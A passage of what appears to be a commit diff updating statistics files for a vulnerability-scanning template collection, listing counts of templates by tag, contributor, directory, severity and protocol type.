@yashanand155","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"jarijaas","count":2},{"name":"0xprial","count":2},{"name":"vavkamil","count":2},{"name":"swissky","count":2},{"name":"incogbyte","count":2},{"name":"foulenzer","count":2},{"name":"unstabl3","count":2},{"name":"manas_harsh","count":2},{"name":"mavericknerd","count":2},{"name":"0xelkomy","count":2},{"name":"shifacyclewala","count":2},{"name":"pxmme1337","count":2},{"name":"joeldeleep","count":2},{"name":"hetroublemakr","count":2},{"name":"lotusdll","count":2},{"name":"0xcrypto","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"x1m_martijn","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"emenalf","count":2},{"name":"gevakun","count":2},{"name":"bp0lr","count":2},{"name":"elsfa7110","count":2},{"name":"moritz nentwig","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"udit_thakkur","count":2},{"name":"bsysop","count":2},{"name":"davidmckennirey","count":2},{"name":"dheerajmadhukar","count":2},{"name":"ehsahil","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"ree4pwn","count":2},{"name":"randomrobbie","count":2},{"name":"streetofhackerr007","count":1},{"name":"yashgoti","count":1},{"name":"patralos","count":1},{"name":"dawid czarnecki","count":1},{"name":"regala_","count":1},{"name":"mhdsamx","count":1},{"name":"@dwisiswant0","count":1},{"name":"noamrathaus","count":1},{"name":"becivells","count":1},{"name":"bolli95","count":1},{"name":"yavolo","count":1},{"name":"tim_koopmans","count":1},{"name":"wabafet","count":1},{"name":"d0rkerdevil","count":1},{"name":"exploitation","count":1},{"name":"_harleo","count":1},{"name":"0xrod","count":1},{"name":"zhenwarx","count":1},{"name":"bjhulst","count":1},{"name":"hanlaomo","count":1},{"name":"sullo","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"shreyapohekar","count":1},{"name":"co0nan","count":1},{"name":"abison_binoy","count":1},{"name":"remonsec","count":1},{"name":"raesene","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"c3l3si4n","count":1},{"name":"hakluke","count":1},{"name":"willd96","count":1},{"name":"th3.d1p4k","count":1},{"name":"luci","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"alifathi-h1","count":1},{"name":"fopina","count":1},{"name":"defr0ggy","count":1},{"name":"dudez","count":1},{"name":"qlkwej","count":1},{"name":"nkxxkn","count":1},{"name":"akash.c","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"soyelmago","count":1},{"name":"0xtavian","count":1},{"name":"thevillagehacker","count":1},{"name":"vsh00t","count":1},{"name":"rtcms","count":1},{"name":"zandros0","count":1},{"name":"_c0wb0y_","count":1},{"name":"0h1in9e","count":1},{"name":"juicypotato1","count":1},{"name":"smaranchand","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ringo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"apt-mirror","count":1},{"name":"kareemse1im","count":1},{"name":"vzamanillo","count":1},{"name":"andirrahmani1","count":1},{"name":"b4uh0lz","count":1},{"name":"ahmed sherif","count":1},{"name":"geraldino2","count":1},{"name":"yashanand155","count":1},{"name":"micha3lb3n","count":1},{"name":"alex","count":1},{"name":"ohlinge","count":1},{"name":"iampritam","count":1},{"name":"_darrenmartyn","count":1},{"name":"alperenkesk","count":1},{"name":"taielab","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"ldionmarcil","count":1},{"name":"sickwell","count":1},{"name":"idealphase","count":1},{"name":"shelld3v","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mah3sec_","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"johnk3r","count":1},{"name":"luskabol","count":1},{"name":"mubassirpatel","count":1},{"name":"_generic_human_","count":1},{"name":"ajaysenr","count":1},{"name":"whynotke","count":1},{"name":"mohammedsaneem","count":1},{"name":"alph4byt3","count":1},{"name":"knassar702","count":1},{"name":"affix","count":1},{"name":"arcc","count":1},{"name":"notsoevilweasel","count":1},{"name":"undefl0w","count":1},{"name":"j33n1k4","count":1},{"name":"blckraven","count":1},{"name":"flag007","count":1},{"name":"0ut0fb4nd","count":1},{"name":"koti2","count":1},{"name":"jeya seelan","count":1},{"name":"cookiehanhoan","count":1},{"name":"omarkurt","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"furkansenan","count":1},{"name":"manuelbua","count":1},{"name":"schniggie","count":1},{"name":"ilovebinbash","count":1},{"name":"johnjhacking","count":1},{"name":"kabirsuda","count":1},{"name":"sshell","count":1},{"name":"pudsec","count":1},{"name":"shifacyclewla","count":1},{"name":"berkdusunur","count":1},{"name":"bad5ect0r","count":1},{"name":"divya_mudgal","count":1},{"name":"ooooooo_q","count":1},{"name":"bing0o","count":1},{"name":"akshansh","count":1},{"name":"kurohost","count":1},{"name":"daviey","count":1},{"name":"absshax","count":1},{"name":"rojanrijal","count":1},{"name":"ipanda","count":1},{"name":"sy3omda","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"52971","count":1},{"name":"dogasantos","count":1},{"name":"deena","count":1},{"name":"fmunozs","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"thezakman","count":1},{"name":"r3naissance","count":1},{"name":"pdp","count":1},{"name":"chron0x","count":1},{"name":"toufik airane","count":1},{"name":"w4cky_","count":1},{"name":"sicksec","count":1},{"name":"its0x08","count":1},{"name":"gal nagli","count":1},{"name":"naglinagli","count":1},{"name":"tirtha_mandal","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"fabaff","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":233},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":187},{"name":"low","count":150}],"types":[{"name":"http","count":1409},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2127d6d969..cc675566c5 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,15 +1,15 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 464 | dhiyaneshdk | 202 | cves | 470 | info | 453 | http | 1408 | -| panel | 201 | pdteam | 184 | vulnerabilities | 232 | high | 395 | file | 42 | +| cve | 464 | dhiyaneshdk | 202 | cves | 470 | info | 453 | http | 1409 | +| panel | 201 | pdteam | 184 | vulnerabilities | 233 | high | 395 | file | 42 | | xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 | -| wordpress | 165 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 | -| rce | 161 | geeknik | 88 | technologies | 129 | low | 150 | | | +| wordpress | 165 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 | +| rce | 162 | geeknik | 88 | technologies | 129 | low | 150 | | | | exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | | | cve2020 | 135 | madrobot | 59 | takeovers | 70 | | | | | | lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | | wp-plugin | 110 | gaurang | 42 | file | 42 | | | | | -| cve2019 | 82 | gy741 | 35 | workflows | 33 | | | | | +| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | | | config | 81 | ice3man | 26 | miscellaneous | 27 | | | | | | tech | 72 | pussycat0x | 25 | network | 25 | | | | | | takeover | 71 | 0x_akoko | 20 | iot | 18 | | | | | @@ -17,585 +17,586 @@ | token | 63 | sheikhrishad | 15 | fuzzing | 10 | | | | | | cve2018 | 62 | milo2012 | 13 | cnvd | 9 | | | | | | apache | 60 | techbrunchfr | 13 | headless | 5 | | | | | -| default-login | 45 | suman_kar | 12 | .pre-commit-config.yaml | 1 | | | | | -| cve2017 | 43 | pr3r00t | 12 | | | | | | | +| default-login | 45 | pr3r00t | 12 | .pre-commit-config.yaml | 1 | | | | | +| cve2017 | 43 | suman_kar | 12 | | | | | | | | file | 42 | cyllective | 11 | | | | | | | | unauth | 39 | random_robbie | 10 | | | | | | | | iot | 33 | righettod | 9 | | | | | | | -| network | 32 | iamthefrogy | 8 | | | | | | | -| sqli | 29 | hackergautam | 8 | | | | | | | -| oracle | 29 | wdahlenb | 8 | | | | | | | +| network | 32 | wdahlenb | 8 | | | | | | | +| oracle | 29 | iamthefrogy | 8 | | | | | | | +| sqli | 29 | aashiq | 8 | | | | | | | | workflow | 28 | nadino | 8 | | | | | | | -| misc | 27 | aashiq | 8 | | | | | | | -| atlassian | 26 | randomstr1ng | 7 | | | | | | | +| misc | 27 | hackergautam | 8 | | | | | | | +| atlassian | 26 | dr_set | 7 | | | | | | | | jira | 25 | oppsec | 7 | | | | | | | -| ssrf | 25 | dr_set | 7 | | | | | | | -| oob | 24 | techryptic (@tech) | 7 | | | | | | | -| logs | 24 | r3dg33k | 7 | | | | | | | -| disclosure | 24 | that_juan_ | 7 | | | | | | | -| redirect | 20 | 0x240x23elu | 7 | | | | | | | -| aem | 18 | melbadry9 | 7 | | | | | | | -| listing | 15 | emadshanab | 7 | | | | | | | -| cisco | 15 | harshbothra_ | 7 | | | | | | | +| oob | 25 | randomstr1ng | 7 | | | | | | | +| ssrf | 25 | techryptic (@tech) | 7 | | | | | | | +| logs | 24 | harshbothra_ | 7 | | | | | | | +| disclosure | 24 | melbadry9 | 7 | | | | | | | +| redirect | 20 | emadshanab | 7 | | | | | | | +| aem | 18 | r3dg33k | 7 | | | | | | | +| cisco | 15 | 0x240x23elu | 7 | | | | | | | +| listing | 15 | that_juan_ | 7 | | | | | | | | cve2016 | 14 | philippedelteil | 6 | | | | | | | | sap | 14 | __fazal | 6 | | | | | | | -| misconfig | 13 | puzzlepeaches | 5 | | | | | | | -| fuzz | 13 | caspergn | 5 | | | | | | | -| cve2015 | 13 | panch0r3d | 5 | | | | | | | | struts | 13 | pentest_swissky | 5 | | | | | | | +| cve2015 | 13 | puzzlepeaches | 5 | | | | | | | +| fuzz | 13 | yanyun | 5 | | | | | | | | debug | 13 | ganofins | 5 | | | | | | | -| android | 12 | yanyun | 5 | | | | | | | -| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | -| auth-bypass | 11 | nodauf | 4 | | | | | | | -| springboot | 11 | e_schultze_ | 4 | | | | | | | +| misconfig | 13 | caspergn | 5 | | | | | | | +| android | 12 | panch0r3d | 5 | | | | | | | +| weblogic | 12 | xelkomy | 4 | | | | | | | +| dns | 11 | github.com/its0x08 | 4 | | | | | | | +| springboot | 11 | iamnoooob | 4 | | | | | | | +| auth-bypass | 11 | rootxharsh | 4 | | | | | | | | zoho | 11 | meme-lord | 4 | | | | | | | -| dns | 11 | iamnoooob | 4 | | | | | | | -| cve2011 | 10 | rootxharsh | 4 | | | | | | | -| devops | 10 | xelkomy | 4 | | | | | | | -| jenkins | 9 | binaryfigments | 3 | | | | | | | -| dlink | 9 | fyoorer | 3 | | | | | | | -| cve2012 | 9 | f1tz | 3 | | | | | | | -| magento | 9 | 0w4ys | 3 | | | | | | | -| adobe | 8 | impramodsargar | 3 | | | | | | | -| ftp | 8 | shine | 3 | | | | | | | -| php | 8 | z3bd | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| aws | 8 | kophjager007 | 3 | | | | | | | -| cve2013 | 8 | joanbono | 3 | | | | | | | -| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | -| cnvd | 8 | tess | 3 | | | | | | | -| cve2014 | 7 | hetroublemakr | 2 | | | | | | | -| joomla | 7 | mavericknerd | 2 | | | | | | | -| vmware | 7 | ree4pwn | 2 | | | | | | | -| scada | 7 | x1m_martijn | 2 | | | | | | | -| xxe | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| cms | 6 | incogbyte | 2 | | | | | | | -| backup | 6 | vavkamil | 2 | | | | | | | -| rails | 6 | gevakun | 2 | | | | | | | -| google | 6 | manas_harsh | 2 | | | | | | | -| api | 6 | afaq | 2 | | | | | | | -| nginx | 6 | random-robbie | 2 | | | | | | | +| cve2011 | 10 | nodauf | 4 | | | | | | | +| devops | 10 | e_schultze_ | 4 | | | | | | | +| magento | 9 | f1tz | 3 | | | | | | | +| cve2012 | 9 | thomas_from_offensity | 3 | | | | | | | +| jenkins | 9 | 0w4ys | 3 | | | | | | | +| dlink | 9 | impramodsargar | 3 | | | | | | | +| php | 8 | fyoorer | 3 | | | | | | | +| adobe | 8 | tess | 3 | | | | | | | +| aws | 8 | joanbono | 3 | | | | | | | +| cnvd | 8 | kophjager007 | 3 | | | | | | | +| ftp | 8 | z3bd | 3 | | | | | | | +| airflow | 8 | shine | 3 | | | | | | | +| gitlab | 8 | binaryfigments | 3 | | | | | | | +| cve2013 | 8 | yash anand @yashanand155 | 3 | | | | | | | +| scada | 7 | 0xelkomy | 2 | | | | | | | +| joomla | 7 | bsysop | 2 | | | | | | | +| cve2014 | 7 | zomsop82 | 2 | | | | | | | +| vmware | 7 | foulenzer | 2 | | | | | | | | citrix | 6 | kiblyn11 | 2 | | | | | | | -| rconfig | 6 | moritz nentwig | 2 | | | | | | | -| dell | 5 | amsda | 2 | | | | | | | -| login | 5 | lu4nx | 2 | | | | | | | -| phpmyadmin | 5 | bp0lr | 2 | | | | | | | -| iis | 5 | unstabl3 | 2 | | | | | | | -| ssti | 5 | lotusdll | 2 | | | | | | | -| confluence | 5 | dheerajmadhukar | 2 | | | | | | | -| jetty | 5 | udit_thakkur | 2 | | | | | | | -| headless | 5 | 0xcrypto | 2 | | | | | | | -| java | 5 | 0xrudra | 2 | | | | | | | -| solr | 5 | emenalf | 2 | | | | | | | -| lucee | 5 | elsfa7110 | 2 | | | | | | | -| circarlife | 5 | davidmckennirey | 2 | | | | | | | -| laravel | 5 | shifacyclewala | 2 | | | | | | | -| ruijie | 5 | swissky | 2 | | | | | | | -| drupal | 5 | jarijaas | 2 | | | | | | | -| jolokia | 4 | bsysop | 2 | | | | | | | -| artifactory | 4 | zomsop82 | 2 | | | | | | | -| hongdian | 4 | pxmme1337 | 2 | | | | | | | -| thinkcmf | 4 | 0xsapra | 2 | | | | | | | -| ibm | 4 | 0xelkomy | 2 | | | | | | | -| netgear | 4 | 0xprial | 2 | | | | | | | -| asp | 4 | joeldeleep | 2 | | | | | | | -| moodle | 4 | randomrobbie | 2 | | | | | | | -| vpn | 4 | foulenzer | 2 | | | | | | | -| traversal | 4 | ehsahil | 2 | | | | | | | -| nodejs | 4 | idealphase | 1 | | | | | | | -| tomcat | 4 | ajaysenr | 1 | | | | | | | -| webserver | 4 | bad5ect0r | 1 | | | | | | | -| elastic | 4 | chron0x | 1 | | | | | | | -| thinkphp | 4 | mhdsamx | 1 | | | | | | | -| samsung | 4 | alperenkesk | 1 | | | | | | | -| cve2009 | 4 | divya_mudgal | 1 | | | | | | | -| magmi | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| solarwinds | 4 | 0xrod | 1 | | | | | | | -| fileupload | 4 | remonsec | 1 | | | | | | | -| django | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| docker | 4 | alifathi-h1 | 1 | | | | | | | -| router | 4 | omarkurt | 1 | | | | | | | -| mongodb | 3 | 52971 | 1 | | | | | | | -| backups | 3 | bolli95 | 1 | | | | | | | -| ssh | 3 | dogasantos | 1 | | | | | | | -| caucho | 3 | tirtha_mandal | 1 | | | | | | | -| windows | 3 | @dwisiswant0 | 1 | | | | | | | -| r-seenet | 3 | pdp | 1 | | | | | | | -| slack | 3 | notsoevilweasel | 1 | | | | | | | -| fanruan | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| nacos | 3 | w4cky_ | 1 | | | | | | | -| ebs | 3 | sushant kamble | 1 | | | | | | | +| rconfig | 6 | 0xprial | 2 | | | | | | | +| google | 6 | pxmme1337 | 2 | | | | | | | +| cms | 6 | mavericknerd | 2 | | | | | | | +| rails | 6 | 0xrudra | 2 | | | | | | | +| nginx | 6 | swissky | 2 | | | | | | | +| api | 6 | ehsahil | 2 | | | | | | | +| backup | 6 | unstabl3 | 2 | | | | | | | +| xxe | 6 | gevakun | 2 | | | | | | | +| java | 5 | bp0lr | 2 | | | | | | | +| ssti | 5 | joeldeleep | 2 | | | | | | | +| ruijie | 5 | moritz nentwig | 2 | | | | | | | +| laravel | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| circarlife | 5 | vavkamil | 2 | | | | | | | +| dell | 5 | dheerajmadhukar | 2 | | | | | | | +| phpmyadmin | 5 | udit_thakkur | 2 | | | | | | | +| lucee | 5 | jarijaas | 2 | | | | | | | +| login | 5 | afaq | 2 | | | | | | | +| jetty | 5 | davidmckennirey | 2 | | | | | | | +| solr | 5 | incogbyte | 2 | | | | | | | +| iis | 5 | shifacyclewala | 2 | | | | | | | +| confluence | 5 | lotusdll | 2 | | | | | | | +| drupal | 5 | lu4nx | 2 | | | | | | | +| headless | 5 | randomrobbie | 2 | | | | | | | +| vpn | 4 | elsfa7110 | 2 | | | | | | | +| traversal | 4 | random-robbie | 2 | | | | | | | +| elastic | 4 | x1m_martijn | 2 | | | | | | | +| artifactory | 4 | 0xcrypto | 2 | | | | | | | +| router | 4 | hetroublemakr | 2 | | | | | | | +| hongdian | 4 | amsda | 2 | | | | | | | +| nodejs | 4 | ree4pwn | 2 | | | | | | | +| docker | 4 | 0xsapra | 2 | | | | | | | +| django | 4 | emenalf | 2 | | | | | | | +| cve2009 | 4 | manas_harsh | 2 | | | | | | | +| fileupload | 4 | johnk3r | 1 | | | | | | | +| netgear | 4 | remonsec | 1 | | | | | | | +| asp | 4 | blckraven | 1 | | | | | | | +| jolokia | 4 | s1r1u5_ | 1 | | | | | | | +| moodle | 4 | tim_koopmans | 1 | | | | | | | +| samsung | 4 | @dwisiswant0 | 1 | | | | | | | +| thinkphp | 4 | thevillagehacker | 1 | | | | | | | +| webserver | 4 | wabafet | 1 | | | | | | | +| tomcat | 4 | sickwell | 1 | | | | | | | +| solarwinds | 4 | gboddin | 1 | | | | | | | +| ibm | 4 | w4cky_ | 1 | | | | | | | +| magmi | 4 | mohammedsaneem | 1 | | | | | | | +| thinkcmf | 4 | regala_ | 1 | | | | | | | +| crlf | 3 | sushant kamble | 1 | | | | | | | | | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| openssh | 3 | ahmed sherif | 1 | | | | | | | -| bypass | 3 | rtcms | 1 | | | | | | | -| amazon | 3 | aceseven (digisec360) | 1 | | | | | | | -| lfr | 3 | jeya seelan | 1 | | | | | | | -| log | 3 | becivells | 1 | | | | | | | -| microstrategy | 3 | johnk3r | 1 | | | | | | | -| springcloud | 3 | streetofhackerr007 | 1 | | | | | | | -| fpd | 3 | mubassirpatel | 1 | | | | | | | -| terramaster | 3 | affix | 1 | | | | | | | -| deserialization | 3 | dudez | 1 | | | | | | | -| resin | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| oa | 3 | rojanrijal | 1 | | | | | | | -| grafana | 3 | hanlaomo | 1 | | | | | | | -| kafka | 3 | alph4byt3 | 1 | | | | | | | -| git | 3 | mohammedsaneem | 1 | | | | | | | -| dedecms | 3 | andirrahmani1 | 1 | | | | | | | -| crlf | 3 | ilovebinbash | 1 | | | | | | | -| ofbiz | 3 | whynotke | 1 | | | | | | | -| kubernetes | 3 | alex | 1 | | | | | | | -| nosqli | 3 | c3l3si4n | 1 | | | | | | | -| printer | 3 | taielab | 1 | | | | | | | -| vbulletin | 3 | cookiehanhoan | 1 | | | | | | | -| icewarp | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| nexus | 2 | abison_binoy | 1 | | | | | | | -| service | 2 | smaranchand | 1 | | | | | | | -| bigip | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| mail | 2 | akash.c | 1 | | | | | | | -| dos | 2 | juicypotato1 | 1 | | | | | | | -| smtp | 2 | luci | 1 | | | | | | | -| leak | 2 | nytr0gen | 1 | | | | | | | -| hashicorp | 2 | vsh00t | 1 | | | | | | | -| frp | 2 | j33n1k4 | 1 | | | | | | | -| mida | 2 | defr0ggy | 1 | | | | | | | -| splunk | 2 | bing0o | 1 | | | | | | | -| httpd | 2 | thezakman | 1 | | | | | | | -| kibana | 2 | deena | 1 | | | | | | | -| zhiyuan | 2 | sy3omda | 1 | | | | | | | -| saltstack | 2 | knassar702 | 1 | | | | | | | -| rockethchat | 2 | noamrathaus | 1 | | | | | | | -| maian | 2 | _harleo | 1 | | | | | | | -| globalprotect | 2 | sullo | 1 | | | | | | | -| kentico | 2 | zandros0 | 1 | | | | | | | -| exposures | 2 | apt-mirror | 1 | | | | | | | -| cve2008 | 2 | dawid czarnecki | 1 | | | | | | | -| intrusive | 2 | manuelbua | 1 | | | | | | | -| hp | 2 | naglinagli | 1 | | | | | | | -| rstudio | 2 | ooooooo_q | 1 | | | | | | | -| flir | 2 | fopina | 1 | | | | | | | -| plesk | 2 | regala_ | 1 | | | | | | | -| rockmongo | 2 | sicksec | 1 | | | | | | | -| yapi | 2 | pudsec | 1 | | | | | | | -| injection | 2 | wabafet | 1 | | | | | | | -| activemq | 2 | ratnadip gajbhiye | 1 | | | | | | | -| sonicwall | 2 | soyelmago | 1 | | | | | | | -| sonarqube | 2 | ipanda | 1 | | | | | | | -| jboss | 2 | patralos | 1 | | | | | | | -| fortios | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| openfire | 2 | 0h1in9e | 1 | | | | | | | -| pega | 2 | thevillagehacker | 1 | | | | | | | -| idrac | 2 | yashanand155 | 1 | | | | | | | -| nagios | 2 | gboddin | 1 | | | | | | | -| nextjs | 2 | flag007 | 1 | | | | | | | -| ecology | 2 | schniggie | 1 | | | | | | | -| cache | 2 | sickwell | 1 | | | | | | | -| chamilo | 2 | mah3sec_ | 1 | | | | | | | -| paloalto | 2 | fabaff | 1 | | | | | | | -| hjtcloud | 2 | sshell | 1 | | | | | | | -| strapi | 2 | @github.com/defr0ggy | 1 | | | | | | | -| ucmdb | 2 | yashgoti | 1 | | | | | | | -| bitrix | 2 | s1r1u5_ | 1 | | | | | | | -| xxljob | 2 | _c0wb0y_ | 1 | | | | | | | -| sharepoint | 2 | absshax | 1 | | | | | | | -| voipmonitor | 2 | kareemse1im | 1 | | | | | | | -| showdoc | 2 | micha3lb3n | 1 | | | | | | | -| natshell | 2 | shifacyclewla | 1 | | | | | | | -| glassfish | 2 | toufik airane | 1 | | | | | | | -| shellshock | 2 | ringo | 1 | | | | | | | -| keycloak | 2 | co0nan | 1 | | | | | | | -| oauth | 2 | kabirsuda | 1 | | | | | | | -| waf | 2 | hakluke | 1 | | | | | | | -| huawei | 2 | kurohost | 1 | | | | | | | -| wordfence | 2 | exploitation | 1 | | | | | | | -| microsoft | 2 | yavolo | 1 | | | | | | | -| odoo | 2 | nkxxkn | 1 | | | | | | | -| hpe | 2 | its0x08 | 1 | | | | | | | -| couchdb | 2 | berkdusunur | 1 | | | | | | | -| webcam | 2 | ldionmarcil | 1 | | | | | | | -| coldfusion | 2 | rodnt | 1 | | | | | | | -| spark | 2 | willd96 | 1 | | | | | | | -| trixbox | 2 | th3.d1p4k | 1 | | | | | | | -| seeyon | 2 | shreyapohekar | 1 | | | | | | | -| vrealize | 2 | undefl0w | 1 | | | | | | | -| jellyfin | 2 | luskabol | 1 | | | | | | | -| openam | 2 | elmahdi | 1 | | | | | | | -| emerge | 2 | gal nagli | 1 | | | | | | | -| smb | 2 | d0rkerdevil | 1 | | | | | | | -| zabbix | 2 | bjhulst | 1 | | | | | | | -| telerik | 2 | b4uh0lz | 1 | | | | | | | -| proxy | 2 | vzamanillo | 1 | | | | | | | -| prometheus | 2 | ohlinge | 1 | | | | | | | -| extractor | 1 | tim_koopmans | 1 | | | | | | | -| emby | 1 | arcc | 1 | | | | | | | -| razor | 1 | furkansenan | 1 | | | | | | | -| servicedesk | 1 | akshansh | 1 | | | | | | | -| discourse | 1 | qlkwej | 1 | | | | | | | -| axis | 1 | koti2 | 1 | | | | | | | -| phpunit | 1 | kba@sogeti_esec | 1 | | | | | | | -| triconsole | 1 | _generic_human_ | 1 | | | | | | | -| fuelcms | 1 | shelld3v | 1 | | | | | | | -| sco | 1 | fmunozs | 1 | | | | | | | -| zmanda | 1 | geraldino2 | 1 | | | | | | | -| anchorcms | 1 | r3naissance | 1 | | | | | | | -| drone | 1 | aaron_costello | 1 | | | | | | | +| kubernetes | 3 | toufik airane | 1 | | | | | | | +| ofbiz | 3 | raesene | 1 | | | | | | | +| ebs | 3 | soyelmago | 1 | | | | | | | +| caucho | 3 | sullo | 1 | | | | | | | +| dedecms | 3 | qlkwej | 1 | | | | | | | +| terramaster | 3 | @github.com/defr0ggy | 1 | | | | | | | +| r-seenet | 3 | streetofhackerr007 | 1 | | | | | | | +| bypass | 3 | deena | 1 | | | | | | | +| resin | 3 | micha3lb3n | 1 | | | | | | | +| microstrategy | 3 | dawid czarnecki | 1 | | | | | | | +| git | 3 | pudsec | 1 | | | | | | | +| printer | 3 | yashgoti | 1 | | | | | | | +| windows | 3 | 0ut0fb4nd | 1 | | | | | | | +| ssh | 3 | absshax | 1 | | | | | | | +| backups | 3 | akshansh | 1 | | | | | | | +| log | 3 | 52971 | 1 | | | | | | | +| fpd | 3 | apt-mirror | 1 | | | | | | | +| nosqli | 3 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| postmessage | 1 | iampritam | 1 | | | | | | | -| aspnuke | 1 | _darrenmartyn | 1 | | | | | | | -| blue-ocean | 1 | 0ut0fb4nd | 1 | | | | | | | -| rdp | 1 | 0xtavian | 1 | | | | | | | -| zeroshell | 1 | blckraven | 1 | | | | | | | -| tika | 1 | daviey | 1 | | | | | | | -| sqlite | 1 | raesene | 1 | | | | | | | -| mailchimp | 1 | zhenwarx | 1 | | | | | | | -| moinmoin | 1 | johnjhacking | 1 | | | | | | | -| nette | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | +| springcloud | 3 | nkxxkn | 1 | | | | | | | +| slack | 3 | _harleo | 1 | | | | | | | +| nacos | 3 | smaranchand | 1 | | | | | | | +| deserialization | 3 | 0xtavian | 1 | | | | | | | +| fanruan | 3 | andirrahmani1 | 1 | | | | | | | +| oa | 3 | undefl0w | 1 | | | | | | | +| grafana | 3 | furkansenan | 1 | | | | | | | +| amazon | 3 | iampritam | 1 | | | | | | | +| vbulletin | 3 | _darrenmartyn | 1 | | | | | | | +| kafka | 3 | fmunozs | 1 | | | | | | | +| lfr | 3 | fabaff | 1 | | | | | | | +| mongodb | 3 | d0rkerdevil | 1 | | | | | | | +| openssh | 3 | co0nan | 1 | | | | | | | +| exposures | 2 | mah3sec_ | 1 | | | | | | | +| cache | 2 | bjhulst | 1 | | | | | | | +| waf | 2 | ahmed sherif | 1 | | | | | | | +| fortios | 2 | taielab | 1 | | | | | | | +| shellshock | 2 | th3.d1p4k | 1 | | | | | | | +| activemq | 2 | zhenwarx | 1 | | | | | | | +| nagios | 2 | hanlaomo | 1 | | | | | | | +| openfire | 2 | dudez | 1 | | | | | | | +| trixbox | 2 | naglinagli | 1 | | | | | | | +| spark | 2 | schniggie | 1 | | | | | | | +| strapi | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| webcam | 2 | ajaysenr | 1 | | | | | | | +| couchdb | 2 | johnjhacking | 1 | | | | | | | +| mida | 2 | arcc | 1 | | | | | | | +| hjtcloud | 2 | geraldino2 | 1 | | | | | | | +| emerge | 2 | sy3omda | 1 | | | | | | | +| proxy | 2 | manuelbua | 1 | | | | | | | +| idrac | 2 | exploitation | 1 | | | | | | | +| oauth | 2 | juicypotato1 | 1 | | | | | | | +| paloalto | 2 | b4uh0lz | 1 | | | | | | | +| splunk | 2 | ipanda | 1 | | | | | | | +| intrusive | 2 | bad5ect0r | 1 | | | | | | | +| smb | 2 | ooooooo_q | 1 | | | | | | | +| rstudio | 2 | alex | 1 | | | | | | | +| 